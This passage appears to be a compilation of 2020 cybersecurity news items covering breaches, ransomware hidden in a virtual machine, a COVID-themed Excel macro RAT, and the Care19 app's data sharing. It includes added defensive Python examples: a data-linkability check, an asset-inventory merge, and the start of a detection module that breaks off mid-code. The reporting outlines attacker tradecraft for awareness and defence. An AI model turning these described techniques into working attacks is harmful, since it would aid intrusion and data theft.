The firm said it had been able to obtain databases related to Sinful Site, SUXX.TO and Nulled.

“All these hacking forums are based on general discussion and sharing of related resources. It is a place where users can find lots of great data leaks, hacking and cracking tools, software, tutorials, and much more. Along with that, over here the users can also take part in active discussions and make new friends,” it explained.

Specifically, the firm now has detailed info on users of SUXX.TO and Nulled, which were dumped on May 20, and private messages from Sinful Site, which were leaked on May 15.

Lawyers Aim £18bn Class Action Suit at easyJet

A specialist in group litigation has filed a potential £18bn class action claim against easyJet in London’s High Court, following the firm’s major data breach disclosure last week.

International law firm PGMBM said it had been contacted by “numerous affected people” and is urging more to come forward to join the case, which would pay out £2000 per impacted customer. 

It clarified that Article 82 of EU General Data Protection Regulation (GDPR) grants customers the right to compensation for inconvenience, distress, annoyance and loss of control of their personal data.

The Luton-headquartered airline revealed last week that a “highly sophisticated” attack on its IT infrastructure had compromised email addresses and travel details of nine million passengers, as well as the credit card details of just over 2200.

Despite claiming that it had no evidence that any of the stolen info had been misused, the airline warned those affected about follow-on phishing attacks.

Although it notified UK regulator the Information Commissioner’s Office (ICO) back in January, at around the time of the incident, it took several months for the firm to come clean to customers.

PGMBM has also claimed that the exposure of customers’ travel plans could pose security risks to those individuals, as well as being a gross invasion of privacy.

“This is a monumental data breach and a terrible failure of responsibility that has a serious impact on easyJet’s customers,” argued managing partner, Tom Goodhead.

“This is personal information that we trust companies with, and customers rightly expect that every effort is made to protect their privacy. Unfortunately, easyJet has leaked sensitive personal information of nine million customers from all around the world.”

The case highlights the potentially serious financial repercussions of a major data breach, on top of the large fines GDPR regulators can theoretically impose.

The ICO has come in for some criticism recently after reports emerged that it may be considering a significantly lower fine than the £183.4m figure posted in a notice of intent last summer, in response to a major breach at British Airways.

Mumbai Police Force Uses ‘The Force’ for Cyber-Safety Campaign

Police in Mumbai have recruited Baby Yoda to help raise awareness of the importance of cyber-safety. 

The law enforcement agency has earned a reputation online for delivering serious messages with humorous memes via social media app Instagram. It only seems appropriate that the force should use the power of 'The Force' to drive home a warning that passwords should be kept private.

On Monday, Mumbai Police shared an image of a popular meme that uses characters from TV space Western series Star Wars: The Mandalorian. In the meme, the show's lone gun fighter shares an amusing exchange with the famous character Baby Yoda.

The meme shows the fighter telling Baby Yoda to close his eyes, after which he asks him, "What do you see, bro?"

Yoda shutters his peepers and replies, "Nothing, bro."

In an amusing edit to the next line of dialogue, Mumbai Police tweaked the meme so that the fighter tells Yoda: "That's your bank balance after you shared your password with me, bro."

Along with the meme, Mumbai Police share the following caption with their 126K Instagram followers: "Share password, do not. There is no question of do."

The funny post was a hit with netizens who expressed their appreciation by filling the comments section with compliments. 

Instagram user rohitksp wrote, "Mumbai police is getting cooler day by day," while user tanabhy punned, "Mumbai police, Yoda best."

User dandekarvaibhav added: "Mumbai Police shared a Star Wars themed meme... My day is made."

User uppalakshit took the joke one step further, quipping, "That's the Bank balance during Lockdown..."

Not every heart was won by the force's attempt to raise awareness of cybersecurity in a humorous way. One user expressed the view that Mumbai police ought to be focusing their resources elsewhere. 

User ashwitha4real wrote in the comments: "Memes are great but there are groups on telegram that are sexually assaulting women, making videos and sharing it. Kindly do something about it."

At time of publication, the Baby Yoda post had garnered 23,291 likes on Instagram and attracted 209 comments.

North Dakota’s Contact Tracing App Sends User Data to Third Parties

A cybersecurity company has claimed that a contact tracing app introduced by North Dakota is sending data to third parties and exposing users' identities.

Like South Dakota and Utah, North Dakota has built its own contact-tracing app, Care19, in an effort to monitor the spread of the novel coronavirus.

Jumbo Privacy alleges that the Care19 app, created by ProudCrowd LLC to track the spread of COVID-19 in The Peace Garden State, is sharing user data with Foursquare and other third-party services.

Foursquare is a location service that provides advertisers with tools to reach audiences who have been at specific locations.

Users of the Care19 app are told in the privacy policy that their "location data is private to you and is stored securely on ProudCrowd, LLC servers. It will not be shared with anyone including government entities or third parties, unless you consent or ProudCrowd is compelled under federal regulations.”

North Dakota claims that users of the app cannot be individually identified. On the state's website in the app FAQ section it states that “the application does not have any information that is tied to an individual person” and information uploaded via the app is "100% anonymous." 

Jumbo disputes this assertion, claiming instead that users accessing the app on an iPhone can be unmasked through the Identifier for Advertisers (IDFA) on their device.

The IDFA is a per-device advertising identifier that lets an advertiser recognize when a phone user has taken an action like a click or an app install.

"They share the IDFA with Foursquare, which means it’s not anonymous,” said Jumbo Privacy CEO Pierre Valade. "It’s a unique ID tied to your phone.”

Foursquare confirmed in a statement that it receives Care19 data. However, the company said it promptly discards the information sent via the app and doesn't use it for anything. 

The Care19 privacy policy indicates that “Your data is identified by an anonymous code.” Jumbo found that, along with the IDFA, this anonymous code was transmitted to Foursquare. The code was also being sent, together with the name given to the phone by the user (e.g., Paul's phone), to remote logger Bugfender.
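Jumbo's point is about linkability rather than any single field: an "anonymous" code stays anonymous only if nothing it travels with, to any recipient, identifies the device or its owner. The block below is an added example, not Jumbo Privacy's tooling or Care19 code: the hostnames, field names and request bodies are constructed to mirror the article's description, and the join logic is this example's own.

```python
"""Linkability check over an app's outbound requests (added example).

Not Jumbo Privacy's tooling or Care19 code. The captured requests, host
names and field names below are constructed to mirror the article: the
same "anonymous" code goes to two third parties, once with the device's
advertising identifier and once with the user-chosen device name.
"""
import re
from collections import defaultdict

# Constructed capture: (destination host, decoded request fields).
CAPTURED_REQUESTS = [
    ("api.care19.example", {"code": "a9c2e4d1", "lat": "46.81", "lon": "-100.78"}),
    ("foursquare.example", {"code": "a9c2e4d1",
                            "idfa": "6D92078A-8246-4BA4-AE5B-76104861E7DC"}),
    ("bugfender.example", {"code": "a9c2e4d1", "device_name": "Paul's iPhone",
                           "event": "upload"}),
]
FIRST_PARTY = {"api.care19.example"}   # assumed operator-controlled host

UUID_RE = re.compile(r"^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)
DEVICE_NAME_FIELDS = {"device_name", "devicename", "device"}


def identifier_kind(field, value):
    """Name the persistent identifier a field carries, or None.

    A UUID-shaped value in any field is treated as a device identifier
    (IDFA/IDFV style); a device-name field carries whatever the user typed,
    which is often their own name."""
    if isinstance(value, str) and UUID_RE.match(value):
        return "advertising identifier" if field.lower() == "idfa" else "device uuid"
    if field.lower() in DEVICE_NAME_FIELDS:
        return "user-visible device name"
    return None


def findings(requests, first_party):
    """One entry per third-party request that sends the app's 'anonymous'
    code together with at least one persistent identifier."""
    out = []
    for host, fields in requests:
        if host in first_party or "code" not in fields:
            continue
        kinds = sorted(k for k in (identifier_kind(f, v) for f, v in fields.items()) if k)
        if kinds:
            out.append((host, fields["code"], kinds))
    return out


def linked_identities(requests, first_party):
    """Pool everything each code was ever sent with, across recipients.

    The code need not be sent with every identifier at once: one recipient
    sees code+IDFA, another code+device name, and anyone who can join on
    the code (or the recipients between them) gets the full picture."""
    pooled = defaultdict(set)
    for _, code, kinds in findings(requests, first_party):
        pooled[code].update(kinds)
    return dict(pooled)


def is_anonymous(requests, first_party):
    """True only if no third party receives the code next to an identifier."""
    return not linked_identities(requests, first_party)


if __name__ == "__main__":
    for host, code, kinds in findings(CAPTURED_REQUESTS, FIRST_PARTY):
        print(f"{host}: code {code} sent with {', '.join(kinds)}")
    print("anonymous:", is_anonymous(CAPTURED_REQUESTS, FIRST_PARTY))
```

Run against a real capture (a proxy log with TLS interception on a test device), the interesting output is the pooled view: a code that reaches one vendor with the IDFA and another with the device name is de-anonymized even though neither vendor alone received both, and a vendor's promise to discard what it receives does not change what was transmitted.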

Businesses Could Face Influx of Attacks When Offices Reopen

Cyber-criminals could be poised to trigger a wave of attacks on businesses when workers return to offices and reconnect to corporate networks, Redscan has warned. As many countries such as the UK prepare to ease COVID-19 lockdown restrictions and allow more people to return to physical workplaces, the cybersecurity firm said organizations need to take action to defend themselves against potential hackers lying dormant on employee devices.

There has been a substantial rise in threat activity over recent months, with cyber-criminals looking to exploit the sudden rise in remote working during the pandemic and the resultant lack of protection. In this period, Redscan has observed a surge in activity such as malspam, external scanning attempts to identify weaknesses in the use of remote access tools and account login attempts from unknown locations.

It therefore believes there could be an influx of attacks when staff reconnect to company networks after returning to their workplaces, with attackers ready to launch attacks including ransomware across a company network. In order to prevent this situation occurring, Redscan said firms should sanitize all endpoints on the return to the office as well as closely monitor networks for evidence of compromises.

George Glass, head of threat intelligence at Redscan, said: “During the COVID-19 pandemic there has been a steady stream of organizations reporting cyber-attacks. However, this is only likely to be the tip of the iceberg. Many more organizations are certain to have been targeted without their knowledge.

“As employees return to work post-lockdown and connect directly to corporate networks, organizations need to be alert to the possibility that criminals could be lying dormant on employee devices, waiting for the opportunity to move laterally through a network, escalate privileges and deploy ransomware.”

Redscan provided other recommendations to companies to tackle this type of threat, including updating anti-virus signatures, connecting all devices to remote networks and educating staff about the latest risks.

Data Breach Afflicts Ohio’s Unemployment Office

A data breach at the Ohio Department of Job and Family Services (ODJFS) has exposed the personal data of Pandemic Unemployment Assistance (PUA) claimants. 

Personal information including names, Social Security numbers, home addresses, and claim receipts was exposed to other claimants due to a security vulnerability detected by Deloitte Consulting on May 15. Deloitte is the technology vendor for PUA systems in several states, including Ohio. 

“A unique circumstance enabled about two dozen Pandemic Unemployment Assistance claimants to inadvertently access a restricted page when logged into the state’s PUA website,” Deloitte said in the statement.

In a breach notification email sent to PUA claimants on May 20, ODJFS said the breach was fixed within one hour of discovery. 

The department stated: “Over the weekend, Deloitte notified ODJFS that about two dozen individuals inadvertently had the capability to view other PUA claimants’ correspondence.” 

According to the department there is no evidence to suggest that any "widespread data compromise" had occurred. 

More than 161,000 Ohioans have applied for unemployment assistance offered in the wake of COVID-19. ODJFS has not revealed how many of these claimants were affected by the data breach. 

Perhaps tellingly, every single Ohioan who has claimed PUA is being offered free credit monitoring by Deloitte Consulting for 12 months.

Deloitte added: "Within an hour of learning of this issue, we identified the cause and stopped the unauthorized access to prevent additional occurrences."

Frustrated claimants, some of whom are still waiting to receive financial assistance under the PUA program, reported the breach on social media. 

ODJFS said action had been taken to ensure that the data breach was a one-off.

The department stated: “ODJFS holds the confidentiality of claimant data in the highest regard and agreed with the immediate steps Deloitte took to prevent any unauthorized PUA access in the future."

Unemployment claims in Ohio since the start of the coronavirus crisis passed the 1 million mark at the end of April, putting pressure on an archaic system.

Non-Cybersecurity Incidents Outnumber Cyber-Attacks in ICO Report

The Information Commissioner’s Office (ICO) has disclosed that reported non-cyber incidents outweighed cyber-incidents in Q4 of 2019.

In its report on incident trends, the ICO said there were 2629 incidents reported to it in Q4 2019, of which 337 were due to “data emailed to incorrect recipient,” 265 were due to “data posted or faxed to incorrect recipient” and 213 were due to “loss/theft of paperwork or data left in insecure location.” The largest cyber-incident categories, by comparison, were phishing (280 incidents) and unauthorized access (175).

As a result, the ICO issued two fines. The first was £500,000 to DSG Retail Limited in January after a point of sale computer system was compromised as a result of a cyber-attack, affecting at least 14 million people. Also, in March, the ICO fined Cathay Pacific Airways Limited £500,000 for failing to protect the security of its customers’ personal data. Between October 2014 and May 2018 Cathay Pacific’s computer systems lacked appropriate security measures which led to customers’ personal details being exposed.

ZIVVER’s CEO and founder Rick Goud pointed out the number of reported data leaks decreases every quarter in the UK, while other countries like Germany, the Netherlands, Denmark and Sweden have shown more than 50% increases. “Per inhabitant, the UK was already reporting about 10-times less data leaks than the 'top'-countries,” he said. “This is not due to less data leaks, but – instead – due to a decrease in reporting culture, possibly prompted by the lack of action shown by the ICO since GDPR came into force.”

In an email to Infosecurity, BH Consulting CEO Brian Honan said the report reinforces the fact that most security breaches are not due to “sophisticated attackers” but are the result of failings in basic security controls.

He added: “Accidental data leakage is one of the key sources for breaches and these can result from the lack of appropriate training to staff on how to handle and process data, from weak security controls that don’t prevent or alert to breaches, or a combination of both.

“Ensuring staff are properly trained in the handling and processing of personal data, the technologies they use as part of their daily work and have effective security awareness training is crucial to preventing these types of errors.”

Honan also pointed out that the blame cannot be solely put down to human error, and we need to ensure our systems and platforms provide staff with a safety net in the event they make a mistake. “This means security professionals also need to ensure the basics are covered and that systems are properly patched, effective email security to protect against phishing attacks and data leakage are in place, and that data is encrypted at rest and in transit,” he said.

“It is also important to remember that no matter what controls are in place a breach can still happen and that staff and the company need to be prepared on how to deal with it and know when and how to report breaches to the ICO, or any other relevant Data Protection Supervisory Authorities or other regulatory bodies.”

RagnarLocker Ransomware Hides in Virtual Machine to Escape Detection

Security researchers are warning of a new ransomware attack technique which deploys the malware as a virtual machine (VM) in order to evade traditional defenses.

Sophos revealed that it recently detected a RagnarLocker attack in which the ransomware was hidden inside an Oracle VirtualBox Windows XP VM.

It said the attack payload was a 122MB installer, with a 282MB virtual image inside concealing a 49KB executable.

“In the detected attack, the Ragnar Locker actors used a GPO task to execute Microsoft Installer (msiexec.exe), passing parameters to download and silently install a 122 MB crafted, unsigned MSI package from a remote web server,” Sophos director of engineering, Mark Loman, explained.

The MSI package contained an Oracle VirtualBox hypervisor and a virtual disk image file (VDI) named micro.vdi, which was an image of a stripped-down version of the Windows XP SP3 operating system.

“Since the vrun.exe ransomware application runs inside the virtual guest machine, its process and behaviors can run unhindered, because they’re out of reach for security software on the physical host machine,” said Loman.

The attack appears to have been highly targeted, as the ransom note contained the victim’s name.

RagnarLocker has been in action recently, after it was deployed against Portuguese energy giant Energias de Portugal (EDP) group in an attack demanding a payment of €10m ($11m).

As Loman explained, the group behind the ransomware typically targets managed service providers (MSPs) and exploits holes in Windows Remote Desktop Protocol (RDP) to gain a foothold into organizations.

“After gaining administrator-level access to the domain of a target and exfiltration of data, they have used native Windows administrative tools such as Powershell and Windows Group Policy Objects (GPOs) to move laterally across the network to Windows clients and servers,” he said.

Japan Probes Theft of Hypersonic Missile Plans – Report

The Japanese government is investigating a potentially serious breach of national security after a cyber-attack on Mitsubishi Electric earlier this year which may have yielded top secret missile plans.

The tech giant said in a statement earlier this week that it reported an incident to the Defense Ministry in February, in which sensitive information including personal data on 8000 employees may have been stolen, according to AP.

Chief cabinet secretary Yoshihide Suga is said to have told reporters that the government is now investigating “the possible impact of the information leak on national security.”

The stolen data is thought to relate to a prototype missile that Mitsubishi was bidding to build. The firm didn’t win the bid but held sensitive documents related to the design as part of the process.

Russia, the US and China appear to be in an arms race to build these hypersonic glide vehicles (HGVs), which are said to combine the speed of a ballistic missile with the maneuvering capabilities of a cruise missile, making them incredibly difficult for conventional defense systems to track.

Given that the missiles were apparently intended to be deployed in Japan’s southern islands to ward off the threat from an increasingly assertive China, it would seem that Beijing-backed hackers are likely to be behind these latest cyber-espionage efforts.

It’s unclear whether the reported incident relates to one revealed by Mitsubishi Electric in January, which took place back in June 2019.

At the time reports suggested likely Chinese hackers had stolen 200MB of data from the firm.

However, Mitsubishi claimed that, although personal and corporate confidential information may have been taken, “sensitive information on social infrastructure such as defense, electric power and railways, highly confidential technical information, and important information concerning business partners has not been leaked."

Zoom Meetings Bombed with Child Sexual Abuse Material

The disruption of nearly 200 Zoom meetings with images of child sexual abuse has prompted the FBI to issue a warning.

In recent months, schools, councils, businesses, and the general public have been using the videoconferencing app to communicate after social distancing and lockdown measures introduced to slow the spread of COVID-19 made face-to-face interaction difficult.  

However, as the number of legitimate users has risen, so too has the number of Zoom-bombing incidents in which malicious users hack meetings to subject attendees to unwanted language and images. 

While some Zoom-bombings consist of little more than a schoolboy prank, others are seriously offensive, featuring lewd imagery, expletives, and racist language. According to the FBI, a growing number of these cyber-attacks now feature material depicting the sexual abuse of minors. 

"During the last few months, the FBI has received more than 195 reports of incidents throughout the United States and in other countries in which a Zoom participant was able to broadcast a video depicting child sexual abuse material (CSAM)," wrote the FBI in a statement released yesterday.

"The FBI considers this activity to be a violent crime, as every time child sexual abuse material is viewed, the depicted child is re-victimized. Furthermore, anyone who inadvertently sees child sexual abuse material depicted during a virtual event is potentially a victim as well."

The Bureau asked any Zoom hosts or administrators who have had a meeting disrupted by the broadcast of CSAM to contact the FBI and to keep a record of what occurred. 

The FBI warned Zoom users to consider the privacy of any videoconferences they schedule. 

"Links to many virtual events are being shared online, resulting in a lack of vetting of approved participants," said the FBI. "Do not make meetings or classrooms public. Do not share a link to a teleconference or classroom on an unrestricted, publicly available social media post. Provide the link directly to specific attendees." 

The Bureau advised users to make their Zoom meetings private either by requiring attendees to enter a meeting password or by using the waiting room feature to control the admittance of guests.

To limit the risk of abusive content being shown, hosts can change the screen-sharing options to "Host Only." 

Raytheon’s Board Takes Voluntary Pay Cut

Raytheon Technologies’ board of directors is taking a voluntary pay cut as the United States continues to be impacted by COVID-19. 

The board has reduced non-employee director compensation by an amount equal to 20% of the director cash retainer. The pay cut will apply for the annual term ending at the 2021 Annual Meeting of Shareowners.

The defense giant, which is headquartered in Waltham, Massachusetts, announced the board's gesture on May 14. 

News of the resolution follows a decision by CEO Greg Hayes to institute a temporary 10% base pay reduction for all salaried employees across the company's Pratt & Whitney and Collins Aerospace Systems businesses as well as its corporate offices. 

Raytheon employs 195,000 people across four industry-leading businesses: Collins Aerospace Systems, Pratt & Whitney, Raytheon Intelligence & Space, and Raytheon Missiles & Defense. 

Temporary reductions in pay announced by Raytheon last month will go into effect from June and remain in place until the end of the year. 

Previously, CEO Greg Hayes and executive chairman Tom Kennedy had volunteered to slash their salaries by 20% for the same period.

In a statement released May 14, Raytheon said: "Raytheon Technologies continues to monitor the crisis and is responding as needed to ensure the wellbeing of its employees, customers and suppliers, while protecting the long-term financial strength of the business."

Raytheon Technologies Corporation was formed in 2020 through the combination of Raytheon Company and the United Technologies Corporation aerospace businesses. 

This week, the company confirmed that it is closing an office in Albuquerque, New Mexico, where 200 people are currently employed. 

Raytheon spokeswoman Heather Uberuaga said the company is seeking to streamline its capabilities and relocate support for key capabilities and customer programs to alternative facilities elsewhere in the United States.

"We think this move is in the best interest of our customers as we look to further integrate and streamline our capabilities with pursuits and programs located at other sites while working with employees on a case-by-case basis to explore their individual employment options going forward,” Uberuaga wrote in an email to the Albuquerque Journal.

Cybersecurity Company Sues Private Equity Firm for Backing Out of Buyout

Cybersecurity firm Forescout Technologies Inc. yesterday sued a private equity firm for backing out of a $1.9bn buyout.

Advent International Corporation agreed to buy Forescout back in February 2020, but four days before the takeover was due to be completed, the firm announced it would no longer be closing the deal. 

According to California company Forescout, Advent said it was reneging on the deal because of the impact of the global outbreak of COVID-19. 

The takeover had been scheduled to go ahead on Monday, May 18. On May 20, Forescout filed a lawsuit in the Delaware Court of Chancery requesting that Advent be ordered to complete the buyout.

In a statement released yesterday, Forescout accused Advent of violating the terms of their merger agreement.

A spokesperson for the aggrieved cybersecurity company said: "Advent’s purported excuse for its wrongful conduct is that a closing condition to the transaction has not been satisfied because a 'material adverse effect' has occurred at Forescout.

"Forescout believes that no material adverse effect has occurred, that all closing conditions are satisfied, and that Advent is obligated to close the transaction."

The cybersecurity company said that the effects of COVID-19 had been factored into negotiations and that Advent "has relied on meritless excuses" to wriggle out of the deal.

"The merger agreement explicitly allocated the risk of any impacts from COVID-19 to Advent," said Forescout.

Theresia Gouw, chair of the Forescout board, described Advent's getting cold feet over the planned buyout as highly disappointing. 

“The only change since the merger agreement was jointly executed in February is the deepening of the COVID-19 pandemic, which has significantly impacted global macro-economic conditions," said Gouw. 

"All companies have been challenged by this pandemic, and it is highly disappointing that Advent would attempt to exploit market volatility to renege on its contractual obligations, particularly when the merger agreement explicitly excludes the effects of a pandemic as a material adverse event."

The surprising turn of events sent Forescout's shares tumbling to an all-time low yesterday. Shares were at just $18.33 when trading opened. Advent International agreed on February 6 to pay $33 a share to take Forescout private.

Winnti Group Targets Video Game Developers with New Backdoor Malware

Researchers from ESET have discovered a new modular backdoor used by the Winnti Group to target several video game companies that develop MMO (massively multiplayer online) games.

As explained in a blog post, the malware, dubbed ‘PipeMon’ by ESET, targeted companies in South Korea and Taiwan. The video games developed by these companies are distributed all around the world, are available on popular gaming platforms and have thousands of simultaneous players.

According to researchers, the new modular backdoor is signed with a code-signing certificate likely stolen during a previous campaign and shares similarities with the PortReuse backdoor.

In at least one case, the attackers compromised a company’s build orchestration server, allowing them to take control of the victim’s automated build systems. This could have allowed the attackers to Trojanize video game executables, although there’s no current evidence that has occurred. In another case, attackers compromised a company’s game servers. With this attack, it would be possible to manipulate in-game currencies for financial gain, ESET explained.

“Multiple indicators led us to attribute this campaign to the Winnti Group. Some of the command and control domains used by PipeMon were used by Winnti malware in previous campaigns,” said Mathieu Tartare, malware researcher at ESET. “Furthermore, in 2019, other Winnti malware was found at some of the same companies that were later discovered to be compromised with PipeMon in 2020.”

Flight Risk Employees Account for Most Insider Threats

Employees or contractors identified as a “flight risk” are linked to 60% of insider threat cases, increasing the likelihood that such incidents will involve theft of sensitive corporate data, according to Securonix.

The vendor’s 2020 Securonix Insider Threat Report was distilled from over 300 real-life insider incidents across multiple sectors.

It revealed that over 80% of staff members deemed likely to terminate their employment will take data with them, anywhere between two weeks and two months prior to them leaving. Flight risk can be determined from web browsing and email behavior, Securonix said.

Unsurprisingly, therefore, data exfiltration is the number one insider threat, with email the most popular vector for data loss, followed by web uploads and cloud storage sites.

Account sharing and shadow IT, especially the prevalence of cloud collaboration tools, are compounding the problem for IT security operations teams, the report claimed.

“Data aggregation and snooping of sensitive data is still prominent in most organizations, however tools to detect such behavior still lag behind. This is primarily due to organizations struggling to classify data that is deemed sensitive, combined with data being vastly distributed across networks and systems,” it explained.

“The circumvention of IT controls is prevalent across all organizations. IT security operations teams, especially ones from large enterprises, are finding it difficult to draw conclusions about such incidents mostly due to lack of, or differences between, policies and procedures for each line of business.”

Pharmaceutical firms accounted for the largest number of data exfiltration incidents analyzed by Securonix, which is understandable considering the highly sensitive IP handled by these organizations.

Behavioral analytics were used most often to detect abnormal user behavior and flag violations.

However, data theft is only one of many risks posed by employees. Many of these stem from negligence rather than deliberate malice. Human error, including misconfiguration of cloud systems and misdelivery of emails, accounted for 22% of breaches analyzed by Verizon in its latest report.

IT Asset Management Forum Launches to Enhance Sector

A not-for-profit body for the asset management sector has been established to advance the overall reputation and recognition of the IT Asset Management (ITAM) industry while providing a collaborative space for ITAM leaders to come together.

The ITAM Forum launches with a board of 15 trustees from across the ITAM industry, representing IT end users, resellers, tool providers and independent consultants, and with two objectives:

  • To educate and evangelize – to encourage more companies to practice ITAM and to attract new professionals into the industry
  • To promote best practice – provide a collaborative, global forum for ITAM leaders to come together and share ideas for the advancement of the ITAM industry (eventually establishing a globally-recognized Organizational certification for ITAM)

Founder Martin Thompson said that with more focus on asset management, due to the COVID-19 pandemic driving more employees to work remotely, “IT Asset Managers have a huge role to play in documenting and unpicking this rapid and unplanned investment. 

“The smart management of assets is a shrewd business practice which delivers benefits far beyond IT. ITAM therefore has a rightful place outside of the niche IT/ITSM domain from where it started, and as a boardroom priority in its own right. The ITAM Forum is here to help it achieve this goal, by raising the profile of the ITAM discipline as much more than a compliance exercise and demonstrating its value to every organization looking to better manage its assets.”

In an email to Infosecurity, Lenny Zeltser, CISO of asset management vendor Axonius, said it was encouraging to see the increasing importance that cybersecurity professionals have been assigning to IT asset management in recent years.

“Security teams recognize that ITAM is a foundational aspect of a security program,” Zeltser said. “We need to know what devices, systems, users and applications we have, so we can implement the appropriate safeguards for them. Industry frameworks such as ISO 27001, CIS Critical Controls and NIST Cybersecurity Frameworks have included the need for ITAM for years. In recent years I've seen security professionals pay much closer attention to this requirement.”

Zeltser also noted that more and more enterprises are recognizing that they don't need yet another source of asset data, and instead look for ways to gather information about IT assets from the various IT data silos, such as the CMDB, network scanners, cloud instrumentation tools, Active Directory and so on. “Each of these sources of data has partial visibility into the organization's assets. By combining this data, organizations are able to get a comprehensive view into their ITAM posture.” 
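The aggregation Zeltser describes, combining partial views from the CMDB, a network scanner, Active Directory and cloud instrumentation into one asset list, can be sketched as follows. This is an added example and not Axonius's or the ITAM Forum's code; the four inventories are constructed, the source names and field names (`name`, `host`, `dNSHostName`, `tag_Name`) are assumptions, and assets are matched on a normalised short hostname.

```python
# Constructed inventories from four silos (not real data): a CMDB export, a network
# scanner result, Active Directory computer objects and cloud instance metadata.
CMDB = [
    {"name": "WEB01", "owner": "ops"},
    {"name": "db02.corp.example", "owner": "dba"},
    {"name": "OLDFILE", "owner": "ops"},            # decommissioned, never removed from CMDB
]
SCANNER = [
    {"host": "web01.corp.example", "ip": "10.0.1.10"},
    {"host": "db02", "ip": "10.0.1.20"},
    {"host": "nas-unknown", "ip": "10.0.5.7"},      # live on the network, registered nowhere
]
AD = [
    {"dNSHostName": "WEB01.corp.example"},
    {"dNSHostName": "DB02.corp.example"},
    {"dNSHostName": "LAPTOP-77.corp.example"},      # domain-joined but not in the CMDB
]
CLOUD = [
    {"instance_id": "i-0123", "tag_Name": "web01", "public_ip": "203.0.113.5"},
]

# Source name -> (records, function that extracts the asset name from one record).
# Field names are assumptions about each silo's export format.
SOURCES = {
    "cmdb": (CMDB, lambda r: r["name"]),
    "scanner": (SCANNER, lambda r: r["host"]),
    "ad": (AD, lambda r: r["dNSHostName"]),
    "cloud": (CLOUD, lambda r: r["tag_Name"]),
}


def asset_key(name: str) -> str:
    """Normalise hostnames so WEB01, web01.corp.example and Web01 collide on one key."""
    return name.strip().lower().split(".")[0]


def merge(sources=SOURCES):
    """Return {asset_key: {"sources": set of silos that saw it, "attrs": merged fields}}.

    Attributes are prefixed with the silo name so that two sources reporting the same
    field (e.g. an IP) do not silently overwrite each other.
    """
    merged = {}
    for src, (records, name_of) in sources.items():
        for rec in records:
            key = asset_key(name_of(rec))
            entry = merged.setdefault(key, {"sources": set(), "attrs": {}})
            entry["sources"].add(src)
            for field, value in rec.items():
                entry["attrs"][f"{src}.{field}"] = value
    return merged


def coverage_gaps(merged, authoritative="cmdb"):
    """Two questions a security team asks of the combined view:

    unmanaged: assets seen by some silo but absent from the authoritative inventory
               (shadow IT, forgotten devices, unregistered cloud instances);
    stale:     inventory entries that no other source has observed at all.
    """
    unmanaged = sorted(k for k, e in merged.items() if authoritative not in e["sources"])
    stale = sorted(k for k, e in merged.items() if e["sources"] == {authoritative})
    return {"unmanaged": unmanaged, "stale": stale}


if __name__ == "__main__":
    view = merge()
    for key, entry in sorted(view.items()):
        print(f"{key:12} seen by: {', '.join(sorted(entry['sources']))}")
    print(coverage_gaps(view))
```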

The ITAM Forum also announced a longer term objective to create a new certification program for ITAM, based on the global ISO standard for the ITAM industry – ISO19770 – which was first published in 2006. 

“By certifying organizations against the ISO standard, the ITAM Forum will look to provide the highest measure of quality to demonstrate the competence of an ITAM department in the face of increasing board level scrutiny,” Thompson said.

“By benchmarking an ITAM department output against recognized ISO standards, stakeholders in the ITAM lifecycle (in particular those not fully versed in the complexity of IT assets) will be assured of quality. While our current priority is to establish the ITAM Forum as the credible voice of the ITAM industry, we look forward to eventually establishing the ITAM Forum certification as the globally-recognized ‘Kitemark’ for ITAM quality.”

Home Chef Breach May Affect Millions of Customers

Home Chef has confirmed a major breach of customers’ personal information, potentially affecting millions of users.

The Chicago-headquartered meal delivery service revealed in a notice on its website that email addresses, encrypted passwords, last four digits of credit card numbers and “other account information such as frequency of deliveries and mailing address” were among the compromised details.

“We are taking action to investigate this situation and to strengthen our information security defenses to prevent similar incidents from happening in the future,” it said.

Although passwords were scrambled, the firm urged customers to reset their credentials anyway. Its encryption of passwords and only partial storage of credit card details will limit the risk exposure to customers, but other personal details could be used to craft convincing phishing attacks spoofing the brand.

“You should also remain vigilant against phishing attacks and monitor your accounts for any suspicious activity,” said Home Chef. “Remember that we will never ask you to send sensitive information over email, and you can make any necessary changes to your accounts by logging into your account directly on our website.”

Although the firm claimed that only “select customer information” was taken, a dark web trader claims to have as many as eight million records up for sale.

Boris Cipot, senior security engineer at Synopsys, argued that even Home Chef’s efforts to minimize risk exposure may be undone.

"Passwords — even encrypted passwords — can be cracked. If a hacker succeeds in accessing password data, it could be a key element in carrying out additional attacks. When we add email addresses to those cracked passwords, attackers may now be able to enter other services such as bank accounts, e-commerce sites, among many others,” he argued.

“With regards to the last four digits of your credit card number, if you believe this is useless data without the full number, think again. Some services require you to only enter the last four numbers to confirm your identity. As such this data can be of use to attackers with the knowledge of how to make the most of such information."

Microsoft Warns of “Massive” #COVID19 RAT

Microsoft is warning of a major new COVID-19 phishing campaign using malicious Excel macros to achieve remote access of victims’ machines via a legitimate support tool.

Microsoft Security Intelligence revealed the news in a series of tweets, claiming the campaign began on May 12.

“The emails purport to come from Johns Hopkins Center bearing ‘WHO COVID-19 SITUATION REPORT.’ The Excel files open w/ security warning & show a graph of supposed coronavirus cases in the US. If allowed to run, the malicious Excel 4.0 macro downloads & runs NetSupport Manager RAT,” it explained.

“For several months now, we’ve been seeing a steady increase in the use of malicious Excel 4.0 macros in malware campaigns. In April, these Excel 4.0 campaigns jumped on the bandwagon and started using COVID-19 themed lures.”

In this respect, the campaign is similar to many others that have been launched over recent weeks and months, with cyber-criminals effectively rebranding existing content with COVID-19 themes to increase success rates.

Google claimed it has been blocking over 240 million COVID-themed spam messages each day, and 18 million malware and phishing emails.

“The hundreds of unique Excel files in this campaign use highly obfuscated formulas, but all of them connect to the same URL to download the payload. NetSupport Manager is known for being abused by attackers to gain remote access to and run commands on compromised machines,” Microsoft said of the latest RAT campaign.

“The NetSupport RAT used in this campaign further drops multiple components, including several .dll, .ini, and other .exe files, a VBScript, and an obfuscated PowerSploit-based PowerShell script. It connects to a C2 server, allowing attackers to send further commands.”
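Both the RagnarLocker tradecraft described earlier (a GPO task driving msiexec.exe to fetch and silently install a package, then running a VirtualBox guest from wherever the MSI unpacked it) and this Excel 4.0 macro campaign (Excel launching a downloaded payload) leave traces in process-creation telemetry. The rules below, an added example that is neither Sophos's nor Microsoft's code, run over constructed Sysmon Event ID 1 style records; the sample paths, URL, VM name and the assumed "normal" VirtualBox install directory are constructed placeholders.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal view of a Sysmon Event ID 1 (process create) record."""
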